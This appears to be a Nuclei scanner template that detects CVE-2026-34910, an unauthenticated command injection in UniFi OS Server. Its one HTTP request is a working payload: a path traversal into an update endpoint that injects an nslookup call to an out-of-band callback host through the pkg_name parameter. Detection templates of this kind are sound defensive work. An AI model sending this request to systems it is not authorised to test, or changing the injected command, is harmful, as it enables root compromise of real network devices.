id: CVE-2026-34910 info: name: UniFi OS Server - Command Injection author: Kazgangap severity: critical description: | A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. impact: | Network attackers can execute arbitrary commands, potentially leading to full system compromise. remediation: | Update to the latest version of UniFi OS. reference: - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis - https://nvd.nist.gov/vuln/detail/CVE-2026-34910 - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b - https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/ classification: cve-id: CVE-2026-34910 epss-score: 0.86958 epss-percentile: 0.99727 cvss-score: 10.0 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H metadata: verified: true max-request: 1 shodan-query: html:"UniFi OS" tags: cve,cve2026,unifi,rce,vkev,kev http: - raw: - | GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'contains_any(body , "CODE_SYSTEM_ERROR", "System failure")' - 'contains(interactsh_protocol, "dns")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100a2ef80381f8b3070774e700454e6614d19bd929eea8a22218517e32c8a4b34bc022100db4306b9191da3fc919430c3e699a8f717ef4cd11efbadbdace4fc66e66aa28e:922c64590222798bb761d5b6d8e72950